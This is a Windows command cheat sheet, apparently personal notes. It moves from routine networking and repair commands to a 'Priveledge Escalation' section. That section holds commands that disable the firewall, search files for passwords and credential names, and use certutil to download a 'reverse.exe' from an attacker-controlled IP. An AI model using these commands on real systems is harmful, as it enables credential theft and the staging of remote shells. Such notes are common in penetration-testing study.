ipconfigdisplays the current TCP/IP network configuration values assigned to the local computer, including IP address, subnet mask, and default gateway
ipconfig /alldisplays detailed configuration information for all network adapters, including physical (MAC) address, DHCP lease information, and DNS server addresses
findstrsearches for a specific string or pattern within a file or text output It's often used in conjunction with other commands to filter results
ipconfig /releasereleases the current DHCP lease for all network adapters on the local computer
ipconfig /renewrenews the DHCP lease for all network adapters on the local computer
ipconfig /release && ipconfig /renewP.S: Need to use it together
ipconfig /displaydnsdisplays the contents of the DNS resolver cache, which contains information about recently accessed websites and their IP addresses
clipcopies the output of a command to the Windows clipboard, allowing you to paste it into another application
ipconfig /flushdnsclears the contents of the DNS resolver cache
nslookupqueries DNS servers to obtain domain name or IP address mapping information
clsclears the command prompt screen
getmac /vdisplays the MAC address (physical address) of all network adapters installed on the local computer, along with other information
powercfg /energygenerates a detailed report of the computer's power consumption and energy efficiency
powercfg /batteryreportgenerates a report of the computer's battery usage over time
assocdisplays or modifies file type associations
chkdsk /fscans the file system on a specified drive and fixes errors found
chkdsk /rscans the file system on a specified drive, locates bad sectors, and recovers readable information
sfc /scannowscans the Windows system files for corruption and attempts to repair any problems found
DISM /Online /Cleanup /CheckHealthchecks the health of the Windows image and reports any issues found
DISM /Online /Cleanup /ScanHealthscans the Windows image for component store corruption and reports any issues found
DISM /Online /Cleanup /RestoreHealthrestores the Windows image from a known good source
tasklistdisplays a list of all currently running processes on the local computer
taskkillterminates a specified process or group of processes
netsh wlan show wlanreportgenerates a report of the wireless network connection history on the local computer
netsh interface show interfacedisplays a list of all network interfaces on the local computer, including their status
`netsh interface ip show addressfindstr "IP Address"`
netsh interface ip show dnsserversdisplays the DNS server addresses assigned to all network adapters on the local computer
netsh advfirewall set allprofiles state offdisables the Windows Firewall for all network profiles (Domain, Private, and Public)
netsh advfirewall set allprofiles state offturns off the Windows Firewall for all network profiles (domain, private, public)
netsh advfirewall set allprofiles state onturns on the Windows Firewall for all network profiles (domain, private, public)
pingsends a series of ICMP echo requests to a specified network address or host name to test the connectivity between the local computer and the target host
ping -tcontinuously sends ICMP echo requests to a specified network address or host name until the command is manually interrupted It is often used for testing network connectivity and stability
tracerttraces the path that an IP packet takes from the local computer to a specified network address or host name by sending a series of ICMP echo requests with increasing Time-To-Live (TTL) values
tracert -dis similar to tracert, but it does not perform reverse DNS lookups to resolve IP addresses to host names
netstatdisplays active network connections, listening ports, and related network statistics
netstat -afdisplays all active TCP and UDP connections and their respective protocol (IPv4 or IPv6) for all network interfaces
netstat -odisplays all active network connections, listening ports, and related network statistics, including the process ID (PID) of the process that is using each connection
netstat -e -t 5displays the Ethernet statistics and active TCP connections for 5 seconds before terminating
route printdisplays the local IPv4 and IPv6 routing tables, including the destination network addresses, network masks, gateways, interface indexes, and metrics
route addadds a new route to the local IPv4 or IPv6 routing table
route deleteremoves a route from the local IPv4 or IPv6 routing table
shutdown /r /fw /f /t 0shuts down and restarts the local computer immediately (/t 0), and forces all applications to close (/f). The /fw parameter directs the system to reboot into the firmware (UEFI or BIOS) setup utility

Priveledge Escalation

Displays comprehensive system information about the Windows operating systemsysteminfo
Displays the name of the current host or computer on the networkhostname
Displays the username of the current userwhoami
Displays the current user's privileges, including their security ID (SID), privilege attributes, and enabled statewhoami /priv
Displays the security groups to which the current user belongs, including their group names, SIDs, and attributeswhoami /groups
Displays the username of the current user using the echo commandecho %username%
Lists all user accounts on the local computernet users
Lists all local groups on the local computernet localgroups
Displays detailed information about the user account named "user1", including their group memberships, privileges, and account statusnet user user1
Lists all global groups in the domain to which the computer belongsnet group /domain
Lists the members of the specified global group in the domainnet group /domain <Group Name>
Displays the current state of the Windows Firewall and any active profilesnetsh firewall show state
Displays the Windows Firewall configuration settingsnetsh firewall show config
Displays detailed IP configuration information for all network adapters, including the IP address, subnet mask, and default gatewayipconfig /all
Displays the IP routing table, including all routes and their associated network destinations, gateways, and interface metricsroute print
Displays the current contents of the ARP cache, which maps IP addresses to physical MAC addressesarp -A
Lists all installed hotfixes and updates, including their names, descriptions, installation dates, and hotfix IDswmic qfe get Caption,Description,HotFixID,InstalledOn
Displays the configuration information for the specified Windows service, including its name, display name, description, path to executable, and dependenciessc qc ["directory_name"]
Searches for the string "password" in all .txt, .xml, and .ini files in the current directory and all subdirectories, and displays the lines where the string was foundfindstr /si password *.txt *.xml *.ini
Searches for files with "pass", "cred", "vnc", or ".config" in their name, recursively in the current directory and all subdirectoriesdir /s *pass* == *cred* == *vnc* == *.config*
Searches for the string "password" in all files in the current directory and all subdirectories, and displays the filenames where the string was foundfindstr /spin "password" *.*
Download the file from local machine with python serverpython3 -m http.server
python -m SimpleHTTPServer
On Windowspython -m http.server<br>python3 -m http.server<br>py -3 -m http.server
Download the file with certutil command (similar to wget on Linux)
certutil -urlcache -f -split http/[IP]:[PORT]/reverse.exe